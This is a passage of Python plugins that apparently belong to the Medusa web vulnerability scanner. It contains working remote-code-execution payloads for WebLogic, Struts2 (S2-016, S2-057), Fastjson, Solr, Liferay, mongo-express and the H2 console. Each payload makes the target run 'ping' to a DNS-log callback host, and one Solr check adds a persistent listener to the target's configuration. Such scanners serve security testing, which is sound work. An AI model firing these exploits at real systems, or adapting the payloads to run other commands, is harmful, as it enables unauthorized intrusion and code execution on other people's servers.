        Headers['Sec-Fetch-Mode']='navigate'
        Headers['Sec-Fetch-User']='******'
        Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'
        Headers['Sec-Fetch-Site']='none'
        Headers['accept-charset']=cmd


        resp = requests.get(payload_url,headers=Headers, timeout=5, proxies=proxies,verify=False)  # verify=False: certificate errors ignored
        time.sleep(2)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(url, payload_url,Headers,DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
    """WebLogic WLS core component deserialization check via DNS-log callback.

    Optionally routes all sockets through a SOCKS/HTTP proxy, resolves
    scheme/host/port from *Url*, then delegates the probe to ``exploit``
    (defined elsewhere) with a ysoserial jar path, a JRMP port and a
    temporary file path. A finding is recorded only when ``DL.result()``
    reports a lookup of ``DL.dns_host()``. *RandomAgent* is unused here.
    Errors go to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    if proxies!=None:
        proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies)
        socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port)  # set the socks proxy
        # NOTE(review): replaces the socket class process-wide, so every later
        # connection in this process — not just this plugin — goes via the proxy.
        socket.socket = socks.socksocket  # apply the proxy to socket

    scheme, url, port = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        DL=Dnslog()
        JrmpPort = "2000"# any port will do (string, as passed to exploit())
        JrmpClient = "JRMPClient"
        YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"  # tool directory + jar name; path helper defined elsewhere
        TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10)  # unique scratch path: timestamp + random suffix
        con,payload=exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient,TempPath)  # exploit() is defined elsewhere; returns (response text, payload) presumably
        time.sleep(5)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(url,payload,con,DL.dns_host(),DL.dns_text())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # record the failure against plugin and target
def medusa(**kwargs)->None:
    """Struts2 S2-016 check via DNS-log callback.

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs*, appends the
    page's ``redirect:`` query string to the URL and GETs it inside its own
    try so a timeout does not abort the check. Only ``DL.result()`` decides
    the finding; the response text is merely attached to the report. Errors
    go to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # requests-style proxy mapping supplied by the caller
    DL=Dnslog()
    con=""  # response text; stays empty if the request below fails
    payload="""?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(DL.dns_host())  # DNS-log hostname is the callback target
    try:
        payload_url = url+payload

        try:# guard: on Linux the probe may hang until timeout, which must not abort the DNS-log check
            resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)  # verify=False: certificate errors ignored
            con = resp.text
        except:
            pass  # bare except also swallows KeyboardInterrupt/SystemExit
        # NOTE(review): if the request raised, `resp` is never bound and the
        # report call below fails with NameError inside the outer handler.

        time.sleep(2)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(**kwargs)->None:
    """Fastjson deserialization check via DNS-log callback.

    POSTs a JSON document whose ``dataSourceName`` points at
    ``DL.dns_host()`` to the bare target URL. A finding needs BOTH a DNS-log
    lookup (``DL.result()``) AND an HTTP 500; a callback with any other
    status is not reported. *Headers* (from *kwargs*) is modified in place.
    Errors go to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    url=kwargs.get("Url")# target URL supplied by the caller
    Headers=kwargs.get("Headers")# request headers supplied by the caller
    proxies=kwargs.get("Proxies")# requests-style proxy mapping supplied by the caller
    try:
        payload_url = url
        DL=Dnslog()
        data = {
            "b": {
                "@type": "com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit",  # DNS-log hostname is the callback target
                "autoCommit": True
            }
        }
        data = json.dumps(data)
        # mutates the caller's Headers dict; anything reusing it sees these values
        Headers['Content-Type']='application/json'
        Headers["Connection"]="close"

        resp = requests.post(payload_url, headers=Headers, data=data,proxies=proxies, timeout=10, verify=False)  # verify=False: certificate errors ignored
        # no sleep before polling; the status-code check narrows false positives
        if DL.result() and resp.status_code==500:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(url,
                                                                                                          payload_url,
                                                                                                          resp.text,DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(Url, RandomAgent, UnixTimestamp):
    """Solr DataImportHandler RCE check (older signature, no proxy support).

    Lists cores at ``/solr/admin/cores``, keeps the last core name from the
    ``status`` map and POSTs the dataimport body to it. Only ``DL.result()``
    decides the finding. TLS verification is left at the library default on
    the first request and disabled on the second. Errors are logged through
    ``ErrorLog`` without the exception object; nothing is returned.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        headers = {
            'User-Agent':
            RandomAgent,
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(
            port) + '/solr/admin/cores'
        step1 = requests.get(payload_url, timeout=6, headers=headers).text  # no proxies / verify flag here
        data = json.loads(step1)  # raises on a non-JSON reply; caught below
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # loop leaves the *last* key of the status map as the core name
            payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Accept': 'application/json',
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest"
            }
            DL = Dnslog()  # initialise DNSlog
            # original author's note: the PoC is fine, the DNSlog side is flaky
            # DL="p61rpm.dnslog.cn"
            # NOTE(review): the body hard-codes `core=test` while the URL uses `name`;
            # the other Solr plugin on this page interpolates `name` here — likely intended.
            data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(
                DL.dns_host())  # DNS-log hostname is the callback target
            resp = requests.post(payload_url,
                                 data=data2,
                                 headers=headers,
                                 timeout=20,
                                 verify=False)  # verify=False: certificate errors ignored
            if DL.result():  # no sleep before polling; a slow callback may be missed
                Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(
                    url, payload_url, data2)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url,
                                     UnixTimestamp).Write()  # pass the url and the scan data to the report writer
                WriteFile().result(str(url),
                                   str(Medusa))  # write to file: url is the target file name, Medusa the result text
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        _l = ErrorLog().Write(url, _)  # call the writer class with the URL and the failing plugin name (the exception itself is dropped)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Fastjson deserialization check (variant building its own headers).

    Resolves scheme/host/port from *Url* and POSTs a JSON document whose
    ``dataSourceName`` points at ``DL.dns_host()``. A finding needs BOTH a
    DNS-log lookup (``DL.result()``) AND an HTTP 400 (the kwargs-style
    sibling requires 500 instead). Errors go to ``ErrorHandling``/``ErrorLog``;
    nothing is returned.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        payload_url = scheme + '://' + url + ':' + str(port)
        DL = Dnslog()
        # DL="777777777777.h3me6i.dnslog.cn"
        # JSON body assembled as text; the DNS-log hostname is the callback target
        data = '''{
        "a": {
            "@type": "java.lang.Class",
            "val": "com.sun.rowset.JdbcRowSetImpl"
        },
        "b": {
            "@type": "com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName": "rmi://%s/Exploit",
            "autoCommit": true
        }
    }
    ''' % DL.dns_host()

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/json',
            'Accept-Language':
            'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }
        resp = requests.post(payload_url,
                             headers=headers,
                             data=data,
                             proxies=proxies,
                             timeout=10,
                             verify=False)  # verify=False: certificate errors ignored
        # no sleep before polling; the status-code check narrows false positives
        if DL.result() and resp.status_code == 400:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
                url, payload_url, resp.text, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 **kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # record the failure against plugin and target
def medusa(Url, RandomAgent, proxies=None, **kwargs) -> None:
    """Check *Url* for Struts2 S2-057 using an out-of-band DNS callback.

    Two OGNL payloads are inserted into the URL path, one request each.
    A finding is recorded only when the DNSLog host reports a lookup for
    the token created by ``Dnslog()``; nothing is returned. Results go to
    ``VulnerabilityDetails`` and ``WriteFile``.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host,
            port and path.
        RandomAgent: User-Agent string sent with each probe.
        proxies: proxy setting, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)

    # NOTE(review): this plugin unpacks four values (including path) while the
    # sibling plugins unpack three — confirm UrlProcessing().result() returns
    # the path here; a mismatch raises outside the try/except below.
    scheme, url, port, path = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; this branch is a no-op
    DL = Dnslog()  # fresh DNSLog token; its host is embedded in both payloads
    con = ""  # last response body, kept for the report even if a request fails
    payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + "ping%20" + DL.dns_host(
    ) + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
    payload2 = "%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + "ping%20" + DL.dns_host(
    ) + "%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/"
    # Each payload is probed on its own; an error on one does not skip the other.
    for payload in [payload1, payload2]:
        try:
            # The expression becomes an extra path segment between the directory
            # part and the last component of the original path.
            path1 = os.path.split(path)[0]
            path2 = os.path.split(path)[1]
            payload_url = scheme + "://" + url + ":" + str(
                port) + path1 + "/" + payload + path2
            headers = {
                'User-Agent': RandomAgent,
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
            }
            try:  # guard: if the target hangs (e.g. on Linux) the timeout must not abort the check
                resp = requests.get(payload_url,
                                    headers=headers,
                                    timeout=6,
                                    proxies=proxies,
                                    verify=False,
                                    allow_redirects=False)
                con = resp.text
            except:
                # Bare except: proxy/connection errors are swallowed too, so
                # `con` may stay empty; detection relies on the DNS callback only.
                pass
            # NOTE(review): polled immediately, with no delay, unlike the sibling
            # plugins — a slow callback can be missed. The check sits inside the
            # loop, so a hit from payload1 is reported again on the payload2 pass.
            if DL.result():
                Medusa = "{} 存在Struts2远程代码执行漏洞(S2-057)\r\n漏洞详情:\r\n版本号:S2-057\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                    url, payload_url, con, DL.dns_text(), DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url,
                                     **kwargs).Write()  # pass url and the scan result to the details writer
                WriteFile().result(str(url),
                                   str(Medusa))  # write to file: url is the target filename, Medusa the result
        except Exception as e:
            # `algroup` is the plugin's name; used to tag the error log.
            # NOTE(review): the string concatenation below raises TypeError if it is None — confirm.
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                                  e)  # write to the error log
def medusa(Url,RandomAgent,proxies=None,**kwargs)->None:
    """Check *Url* for the Solr RunExecutableListener RCE via DNS callback.

    Steps: list cores from ``/solr/admin/cores``, register a ``postCommit``
    listener on the last core listed, then trigger it through ``/update``.
    A finding is recorded only when the DNSLog host reports a lookup;
    nothing is returned.

    Args:
        Url: target URL, split by ``UrlProcessing`` into scheme, host, port.
        RandomAgent: User-Agent string for the probe requests.
        proxies: proxy setting, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
        # NOTE(review): no verify=False here, unlike the POSTs below — a
        # self-signed certificate makes this raise, and the whole check then
        # ends in the except branch as a plugin error rather than "not found".
        step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = headers).text
        data = json.loads(step1)  # raises ValueError on a non-JSON reply (caught below)
        if 'status' in data:
            name = ''
            # The loop overwrites `name` each pass, so only the last core listed is probed.
            for x in data['status']:
                name = x
            payload = "/solr/"+name+"/config"
            payload2 = "/solr/" + name + "/update"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            DL = Dnslog()  # initialise the DNSLog token
            rm=randoms().result(10)  # random listener name, also used as the document id below
            # Side effect on the target: this adds a persistent listener to the
            # core's config and nothing here removes it after the check.
            data1='''{"add-listener":{"event":"postCommit","name":"'''+rm+'''","class":"solr.RunExecutableListener","exe":"ping","dir":"/usr/bin/","args":["'''+DL.dns_host()+'''"]}}'''
            data2='''[{"id":"'''+rm+'''"}]'''
            headers2 = {
                'User-Agent': RandomAgent,
                'Accept': 'application/json',
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/json"
            }
            # Original author's note: the PoC is fine, the DNSlog side is what is unreliable.
            #DL="p61rpm.dnslog.cn"
            # NOTE(review): the config POST reuses `headers` (no Content-Type);
            # `headers2` is only used for the update request — possibly unintended.
            resp = requests.post(payload_url,data=data1,headers=headers,proxies=proxies, timeout=20, verify=False)
            resp2 = requests.post(payload_url2, data=data2, headers=headers2, proxies=proxies,timeout=20, verify=False)
            # Polled immediately after the commit; a slow callback may be missed.
            if DL.result():
                Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n模板返回值:{}\r\n执行结果:{}\r\n".format(url,payload_url,resp.text,resp2.text)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass url and the scan result to the details writer
                WriteFile().result(str(url),str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin name for the error log
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # log URL and plugin name (argument order differs from the sibling plugins)
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Check *Url* for the Liferay Portal JSON-WS deserialisation RCE.

    Posts a hex-encoded serialised Java object to ``/api/jsonws/invoke``
    and, after a short wait, records a finding only if the DNSLog host
    reports a lookup for the embedded token. Nothing is returned.

    Args:
        Url: target URL, split by ``UrlProcessing`` into scheme, host, port.
        RandomAgent: User-Agent string for the probe request.
        proxies: proxy setting, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    try:
        payload = '/api/jsonws/invoke'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close"
        }
        DL = Dnslog()  # fresh DNSLog token
        #DL="http://333.q7d5zn.dnslog.cn".encode('utf-8')
        # Serialised Java object as bytes; the DNSLog host is substituted via
        # bytes %-formatting (dns_host() is a str, hence the encode()).
        hex_data = b'\xac\xed\x00\x05sr\x00=com.mchange.v2.naming.ReferenceIndirector$ReferenceSerializedb\x19\x85\xd0\xd1*\xc2\x13\x02\x00\x04L\x00\x0bcontextNamet\x00\x13Ljavax/naming/Name;L\x00\x03envt\x00\x15Ljava/util/Hashtable;L\x00\x04nameq\x00~\x00\x01L\x00\treferencet\x00\x18Ljavax/naming/Reference;xppppsr\x00\x16javax.naming.Reference\xe8\xc6\x9e\xa2\xa8\xe9\x8d\t\x02\x00\x04L\x00\x05addrst\x00\x12Ljava/util/Vector;L\x00\x0cclassFactoryt\x00\x12Ljava/lang/String;L\x00\x14classFactoryLocationq\x00~\x00\x07L\x00\tclassNameq\x00~\x00\x07xpsr\x00\x10java.util.Vector\xd9\x97}[\x80;\xaf\x01\x03\x00\x03I\x00\x11capacityIncrementI\x00\x0celementCount[\x00\x0belementDatat\x00\x13[Ljava/lang/Object;xp\x00\x00\x00\x00\x00\x00\x00\x00ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\nppppppppppxt\x00\x03Expt\x00\x1b%st\x00\x03Foo' % DL.dns_host(
        ).encode('utf-8')
        data = str(binascii.hexlify(hex_data), encoding="utf-8")  # hex text for the HexAsciiSerializedMap field
        # Form body as written; p_auth and formDate are sent as the literal placeholders.
        post_data = """cmd={"/expandocolumn/update-column":{}}&p_auth=<validtoken>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:""" + data + """;"}"""
        resp = requests.post(payload_url,
                             data=post_data,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        time.sleep(3)  # give the out-of-band lookup time to reach the DNSLog service
        if DL.result():
            Medusa = "{}存在LiferayPortal远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n随机的DNSLOG:{}\r\n返回数据包:{}\r\n".format(
                url, payload_url, post_data, DL.dns_host(), resp.text)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 **kwargs).Write()  # pass url and the scan result to the details writer
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing the concatenation below raises TypeError — confirm.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # write to the error log
def medusa(Url, RandomAgent, Token, proxies=None) -> None:
    """Check *Url* for the mongo-express ``/checkValid`` RCE via DNS callback.

    Posts a ``document=`` expression that runs ``ping`` against the DNSLog
    host, waits, and records a finding only if the DNSLog host reports a
    lookup. Nothing is returned; results go through ``ClassCongregation``.

    Args:
        Url: target URL (see the UrlProcessing note below).
        RandomAgent: User-Agent string for the probe request.
        Token: passed positionally to ``ClassCongregation.VulnerabilityDetails``.
        proxies: proxy setting, normalised by ``Proxies().result``.
    """
    proxies = Proxies().result(proxies)

    # NOTE(review): UrlProcessing(Url) is called directly, without the
    # .result() used by the sibling plugins — if UrlProcessing is a class this
    # unpacking fails, and it runs outside the try so the error propagates.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    try:
        payload = "/checkValid"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        dns = Dnslog()  # fresh DNSLog token
        data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(
            dns.dns_host())

        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            # Hard-coded Basic credentials (base64 of admin:pass, the mongo-express
            # default): the check only succeeds where the defaults are still in use.
            'Authorization': 'Basic YWRtaW46cGFzcw==',
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            # Fixed value; requests normally recomputes Content-Length for a str body,
            # so this is probably overridden — confirm.
            'Content-Length': '123'
        }
        # NOTE(review): the session is never closed; `with requests.session() as s:`
        # would release the connection.
        s = requests.session()
        s.post(payload_url,
               data=data,
               headers=headers,
               timeout=6,
               proxies=proxies,
               verify=False)
        time.sleep(10)  # give the out-of-band lookup time to reach the DNSLog service
        if dns.result():
            Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(
                url, payload_url, data)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # pass url and the scan result to the details writer
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin name for the error log
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log URL and plugin name
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
    """Check *Url* for the Spring Boot H2 console JNDI injection via DNS callback.

    Fetches the H2 console login page to obtain a session id, then submits
    a data-source form whose JNDI URL points at the DNSLog host. A finding
    is recorded only if the DNSLog host reports a lookup. Nothing is returned.

    Args:
        Url: target URL, split by ``UrlProcessing`` into scheme, host, port.
        RandomAgent: User-Agent string for the probe requests.
        proxies: proxy setting, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    try:
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        payload ="/h2-console/login.do?jsessionid="
        # First request with an arbitrary session id, only to read the real one back from the page.
        payload_url = scheme + "://" + url + ":" + str(port) + payload+"ad3ae393781ccf8d7abf0345aa88e398"
        jsession = requests.get(payload_url, timeout=5,proxies=proxies, verify=False, headers=headers, )
        # NOTE(review): a module-level global mutated from a plugin; a plain local
        # would do and avoids state leaking between calls.
        global pgroups
        preg = re.compile(r"login\.jsp\?jsessionid=(.*?)'", re.S)
        pgroups = re.findall(preg, jsession.text)
        if not pgroups:
            # Fallback pattern for the other page variant.
            preg = re.compile(r"admin\.do\?jsessionid=(.*?)\"", re.S)
            pgroups = re.findall(preg, jsession.text)

